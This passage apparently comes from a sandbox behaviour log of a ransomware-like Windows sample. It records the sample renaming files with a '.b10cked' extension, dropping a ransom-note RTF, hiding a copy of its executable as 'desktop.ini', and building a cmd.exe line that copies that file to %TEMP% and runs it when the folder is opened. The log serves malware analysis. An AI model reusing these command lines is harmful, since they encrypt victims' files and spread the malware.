lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1df [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0145.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1df [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1df [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0145.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.846] ReadFile (in: hFile=0x114, lpBuffer=0x1273a88, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, 
lpNumberOfBytesRead=0x12ec08*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0145.847] WriteFile (in: hFile=0x114, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-238, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf1 [0145.847] ReadFile (in: hFile=0x114, lpBuffer=0x1273a88, nNumberOfBytesToRead=0xee, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0xee, lpOverlapped=0x0) returned 1 [0145.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-238, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf1 [0145.847] WriteFile (in: hFile=0x114, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0xee, lpOverlapped=0x0) returned 1 [0145.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0145.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="directories.acrodata", cchWideChar=20, lpMultiByteStr=0x13286f4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="directories.acrodata", lpUsedDefaultChar=0x0) returned 20 [0145.851] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1df [0145.851] 
WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0145.851] CloseHandle (hObject=0x114) returned 1 [0145.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR") returned 0x43 [0145.852] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.853] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xb48, dwThreadId=0xa80)) returned 1 [0145.854] CloseHandle (hObject=0x110) returned 1 [0145.854] CloseHandle 
(hObject=0x114) returned 1 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount1=57, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 1 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0145.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount1=57, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0145.854] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0145.855] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0145.855] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.855] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.855] CharUpperBuffW (in: lpsz="type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0145.855] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.855] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb2c, dwThreadId=0x968)) returned 1 [0145.860] CloseHandle (hObject=0x110) returned 1 [0145.860] CloseHandle (hObject=0x114) returned 1 [0145.860] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf")) returned 0xffffffff [0145.860] GetLastError () returned 0x2 [0145.860] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" 
(normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0145.862] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf")) returned 0x2020 [0145.862] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.862] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.862] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.862] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.862] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0145.863] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.863] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0145.863] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.863] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security") returned 0x36 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x196 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x196 [0145.863] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0145.863] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xac8, dwThreadId=0xa94)) returned 1 [0145.871] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0146.801] CloseHandle (hObject=0x114) returned 1 [0146.801] CloseHandle (hObject=0x110) returned 1 [0146.801] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0146.801] FindFirstFileW (in: 
lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0146.801] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0146.801] GetTickCount () returned 0x2da57 [0146.801] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20359072200) returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, 
lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0146.802] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"Security\" & type \"Security\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"SECURITY\" & TYPE \"SECURITY\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0146.802] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"Security\" & type \"Security\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"SECURITY\" & TYPE \"SECURITY\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0146.802] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0146.802] CoInitialize (pvReserved=0x0) returned 0x0 [0146.802] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, 
